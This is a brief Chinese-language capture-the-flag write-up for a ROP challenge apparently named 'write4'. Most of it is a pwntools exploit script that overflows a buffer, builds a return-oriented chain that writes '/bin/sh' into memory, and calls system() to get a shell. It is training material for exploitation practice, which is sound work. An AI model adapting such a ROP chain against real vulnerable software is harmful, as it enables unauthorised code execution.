1.9.2. PreAlpha

z这个challenge的主要点是将数据写入内存再把内存地址传递给rdi。

环境: ubuntu18.04 、 pwntools(py3)

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *

elf = context.binary = ELF('write4') #文件名

io = process(elf.path)

data_seg = p64(0x601000)
systemad = p64(0x4005e0)
pop_r14_r15 = p64(0x400890)
shstr = "/bin/sh\x00"
movstr = p64(0x400820)
retad = p64(0x400806)
poprdi = p64(0x400893)

payload = bytes('A','latin-1') * 40 # padding
payload += pop_r14_r15
payload += data_seg
payload += bytes(shstr,'latin-1')
payload += movstr
payload += poprdi
payload += data_seg
payload += retad
payload += systemad

io.sendline(payload)
io.interactive()

惯例system前调用一次ret对齐内存=-=

以上

image-20200418101056821